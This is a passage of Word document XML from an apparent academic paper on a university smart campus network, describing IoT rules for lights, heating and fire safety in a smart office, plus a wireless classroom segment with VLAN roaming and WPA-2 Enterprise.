                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3150870" cy="200152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3E7B65B2" w14:textId="742572CA" w:rsidR="00D54EF0" w:rsidRDefault="00D54EF0" w:rsidP="00D54EF0">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: UWTSD smart IoT Office</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D82FC" w14:textId="588443FD" w:rsidR="001A61A0" w:rsidRDefault="001A61A0" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The IoT </w:t>
      </w:r>
      <w:r w:rsidR="001E6971">
        <w:t xml:space="preserve">wired 802.3 </w:t>
      </w:r>
      <w:r>
        <w:t>devices that have been utilised within the smart office are;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6272BC" w14:textId="17D876A8" w:rsidR="001A61A0" w:rsidRDefault="001A61A0" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664CD548" w14:textId="01B185BB" w:rsidR="001A61A0" w:rsidRDefault="001A61A0" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A61A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Motion Sensor and Light;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> These two sensors </w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> programmed at the IoT datacentre</w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t xml:space="preserve"> registration server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so that they are linked together</w:t>
      </w:r>
      <w:r w:rsidR="00F84047">
        <w:t xml:space="preserve"> by a set of rules</w:t>
      </w:r>
      <w:r>
        <w:t>. When motion is detected in the room the lights are turned on and when there is no motion within the room the lights turn off.</w:t>
      </w:r>
      <w:r w:rsidR="00F84047">
        <w:t xml:space="preserve"> The rules for this operation can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00F84047" w:rsidRPr="00F84047">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>figure</w:t>
      </w:r>
      <w:r w:rsidR="00F84047">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F84047" w:rsidRPr="00F84047">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>27-28</w:t>
      </w:r>
      <w:r w:rsidR="00F84047" w:rsidRPr="00F84047">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E88010" w14:textId="7785CCE9" w:rsidR="00F84047" w:rsidRDefault="00F84047" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE97B2F" w14:textId="77777777" w:rsidR="00F84047" w:rsidRDefault="00F84047" w:rsidP="00F84047">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797558FE" wp14:editId="4A653272">
            <wp:extent cx="3200400" cy="1322614"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1143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5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="47968"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="1322614"/>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63130473" w14:textId="652DFC63" w:rsidR="00F84047" w:rsidRDefault="00F84047" w:rsidP="00F84047">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Office Lights and Motion Detector IoT Rule = Lights On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088DD1A9" w14:textId="614D679E" w:rsidR="00F84047" w:rsidRDefault="00F84047" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CD2B90" w14:textId="77777777" w:rsidR="00F84047" w:rsidRDefault="00F84047" w:rsidP="00F84047">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12B7BFFC" wp14:editId="268D6E19">
            <wp:extent cx="3206115" cy="1338943"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="139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6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="47885"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3206115" cy="1338943"/>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50E196B5" w14:textId="3279F9E8" w:rsidR="001A61A0" w:rsidRDefault="00F84047" w:rsidP="00F84047">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0DF5">
        <w:t>Office Lights and Motion Detector IoT Rule = Light O</w:t>
      </w:r>
      <w:r>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF742D1" w14:textId="395945CF" w:rsidR="001A61A0" w:rsidRDefault="001A61A0" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A61A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Temperature Sensor and Thermostat;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> These two sensors have been programmed</w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t xml:space="preserve"> at the IoT datacentre registration server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t>so that they are linked via</w:t>
      </w:r>
      <w:r w:rsidR="00EC1728">
        <w:t xml:space="preserve"> rules, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">so that when the temperature of the room is </w:t>
      </w:r>
      <w:r w:rsidR="00EC1728">
        <w:t>detected to be less than</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8</w:t>
      </w:r>
      <w:r w:rsidRPr="001A61A0">
        <w:t>°C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by the temperature sensor, the thermostat automatically heats the room to 20</w:t>
      </w:r>
      <w:r w:rsidRPr="001A61A0">
        <w:t>°C</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC1728" w:rsidRPr="00EC1728">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC1728">
        <w:t xml:space="preserve">The rules for this operation can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00EC1728" w:rsidRPr="00F84047">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>figu</w:t>
      </w:r>
      <w:r w:rsidR="00EC1728">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">re </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidR="00EC1728">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26698767" w14:textId="397C34DD" w:rsidR="00EC1728" w:rsidRDefault="00EC1728" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E6F1ED" w14:textId="77777777" w:rsidR="00EC1728" w:rsidRDefault="00EC1728" w:rsidP="00EC1728">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D9F6C45" wp14:editId="0B3950B5">
            <wp:extent cx="3200400" cy="1644015"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="133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200400" cy="1644015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA1DFE" w14:textId="0555BFBF" w:rsidR="001A61A0" w:rsidRDefault="00EC1728" w:rsidP="00EC1728">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Office Temperature IoT Rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F4F8CD" w14:textId="34473192" w:rsidR="001A61A0" w:rsidRDefault="001A61A0" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A61A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Smoke Detector, Fire Alarm and Fire Sprinklers;</w:t>
      </w:r>
      <w:r w:rsidRPr="001A61A0">
        <w:t xml:space="preserve"> These three sensors have been programmed</w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t xml:space="preserve"> at the IoT datacentre registration server so they are linked together by a set of rules,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>so that if smoke is detected and/or extreme heat from fire, the fire</w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t xml:space="preserve"> and smoke</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> alarm</w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sounded so that people can safely evacuate the building and also the fire sprinklers are activated to extinguish </w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fire.</w:t>
      </w:r>
      <w:r w:rsidR="00EC1728">
        <w:t xml:space="preserve"> The rules for this operation can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00EC1728" w:rsidRPr="00F84047">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>figu</w:t>
      </w:r>
      <w:r w:rsidR="00EC1728">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00EC1728">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>30-31</w:t>
      </w:r>
      <w:r w:rsidR="00EC1728">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0514B93E" w14:textId="07133660" w:rsidR="0021356E" w:rsidRPr="0021356E" w:rsidRDefault="0021356E" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C12E23E" w14:textId="77777777" w:rsidR="0021356E" w:rsidRDefault="0021356E" w:rsidP="0021356E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6792CEAA" wp14:editId="38B619E2">
            <wp:extent cx="3206115" cy="1300842"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="139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38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="48926"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3206115" cy="1300842"/>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0719B2DB" w14:textId="1B511E86" w:rsidR="0021356E" w:rsidRDefault="0021356E" w:rsidP="0021356E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Smoke Alarm and Fire Sprinklers Rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C34C38" w14:textId="534FAB5A" w:rsidR="00EC1728" w:rsidRPr="0021356E" w:rsidRDefault="00EC1728" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685B4E31" w14:textId="77777777" w:rsidR="0021356E" w:rsidRDefault="00EC1728" w:rsidP="0021356E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BCC1DFE" wp14:editId="66388E58">
            <wp:extent cx="3200400" cy="1328057"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="2476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9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="47066"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="1328057"/>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14A6A572" w14:textId="1BCA839E" w:rsidR="00EC1728" w:rsidRDefault="0021356E" w:rsidP="0021356E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Office Extreme Heat Fire Alarm and Sprinkler Rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F0659" w14:textId="1EE478A7" w:rsidR="00295B89" w:rsidRPr="001A61A0" w:rsidRDefault="00295B89" w:rsidP="001A61A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>An RF-ID door has also been utilised within the</w:t>
      </w:r>
      <w:r w:rsidR="00236250">
        <w:t xml:space="preserve"> smart</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> office for physical security acces</w:t>
      </w:r>
      <w:r w:rsidR="00236250">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BD1D63">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800C17A" w14:textId="77777777" w:rsidR="00D87B36" w:rsidRPr="00D87B36" w:rsidRDefault="00D87B36" w:rsidP="001E6971">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C026E84" w14:textId="0983EEA1" w:rsidR="00654B17" w:rsidRDefault="00654B17" w:rsidP="008F5C3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B17">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">802.11 </w:t>
      </w:r>
      <w:r w:rsidR="00CE3B36">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5G </w:t>
      </w:r>
      <w:r w:rsidRPr="00654B17">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Wireless LAN (WLAN) Classrooms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14853E78" w14:textId="16B57F98" w:rsidR="009B0BEF" w:rsidRDefault="00D87B36" w:rsidP="008F5C3A">
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="009B0BEF">
        <w:t>oaming</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Access Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BECAAF5" w14:textId="77777777" w:rsidR="001E6971" w:rsidRPr="001E6971" w:rsidRDefault="001E6971" w:rsidP="008F5C3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C6238A" w14:textId="68E1641A" w:rsidR="00491944" w:rsidRPr="000A584A" w:rsidRDefault="001E6971" w:rsidP="001E6971">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The smart classrooms </w:t>
      </w:r>
      <w:r w:rsidR="002541E8">
        <w:t xml:space="preserve">each </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">contain a layer-2 access switch that is wired to the </w:t>
      </w:r>
      <w:r w:rsidR="00491944">
        <w:t>projector, lectures PC along</w:t>
      </w:r>
      <w:r w:rsidR="002541E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00491944">
        <w:t>with the 802.11</w:t>
      </w:r>
      <w:r w:rsidR="00CE3B36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE3B36">
        <w:t>5Ghz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wireless controllers and lightweight access points</w:t>
      </w:r>
      <w:r w:rsidR="00136020">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that have all been configure for roaming</w:t>
      </w:r>
      <w:r w:rsidR="00B01893">
        <w:t xml:space="preserve"> between VLAN 2</w:t>
      </w:r>
      <w:r w:rsidR="00C408FB">
        <w:t xml:space="preserve">,3 </w:t>
      </w:r>
      <w:r w:rsidR="00B01893">
        <w:t>and 11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002541E8">
        <w:t>this design will</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provide higher throughput</w:t>
      </w:r>
      <w:r w:rsidR="00491944">
        <w:t xml:space="preserve">, lower latency </w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00491944">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002541E8">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r w:rsidR="00491944">
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devices </w:t>
      </w:r>
      <w:r w:rsidR="002541E8">
        <w:t xml:space="preserve">connected </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00491944">
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> redundancy. </w:t>
      </w:r>
      <w:r w:rsidR="002541E8">
        <w:t xml:space="preserve"> WPA-2 Enterprise has been utilised at the WLAN segment of the network that will be discussed in further detail within the </w:t>
      </w:r>
      <w:r w:rsidR="002541E8" w:rsidRPr="00846F41">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cybersecurity Considerations and Implementation</w:t>
      </w:r>
      <w:r w:rsidR="002541E8">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002541E8" w:rsidRPr="002541E8">
        <w:t>section of this paper</w:t>
      </w:r>
      <w:r w:rsidR="002541E8">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010355B1" w14:textId="77777777" w:rsidR="002541E8" w:rsidRDefault="002541E8" w:rsidP="001E6971">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BC2C0D" w14:textId="525550FC" w:rsidR="001E6971" w:rsidRDefault="001E6971" w:rsidP="001E6971">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Wireless</w:t>
      </w:r>
      <w:r w:rsidR="00CE3B36">
        <w:t xml:space="preserve"> 802.11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE3B36">
        <w:t xml:space="preserve">5G </w:t>
      </w:r>
      <w:r>
        <w:t>Io</w:t>
      </w:r>
      <w:r w:rsidR="00B01893">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devices have been installed as opposed to 802.3 wired devices to reduce cabling within the room that is economically expensive and also for future scalability of IoT devices within the University.</w:t>
      </w:r>
      <w:r w:rsidR="000A584A" w:rsidRPr="000A584A">
        <w:t xml:space="preserve"> Power Over Wi-Fi (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A584A" w:rsidRPr="000A584A">
        <w:t>PoWiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A584A" w:rsidRPr="000A584A">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="000A584A">
        <w:t xml:space="preserve">battery charging technology would have also been implemented </w:t>
      </w:r>
      <w:r w:rsidR="0034185B">
        <w:t xml:space="preserve">within all of the IoT devices utilised within the network </w:t>
      </w:r>
      <w:r w:rsidR="000A584A">
        <w:t xml:space="preserve">to keep all of the </w:t>
      </w:r>
      <w:r w:rsidR="00297A31">
        <w:t>smart</w:t>
      </w:r>
      <w:r w:rsidR="000A584A">
        <w:t xml:space="preserve"> devices mentioned within the network charged at all times, removing the need for batteries to be manually changed and devices to lose power whilst monitoring and operating important devices such as fire alarms, smoke detectors etc.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The classroom segment is illustrated within </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6971">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6971">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A7AEF" w14:textId="6F9AF0E6" w:rsidR="001E6971" w:rsidRDefault="001E6971" w:rsidP="001E6971">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="392DD370" w14:textId="11D31E28" w:rsidR="00B01893" w:rsidRDefault="00B859D4" w:rsidP="00B01893">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B3895FB" wp14:editId="6DB3288A">
            <wp:extent cx="3202940" cy="1057910"/>
            <wp:effectExtent l="19050" t="19050" r="16510" b="279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t="-9084" r="-40" b="-7395"/>
                    <a:stretch/>
                  </pic:blipFill>
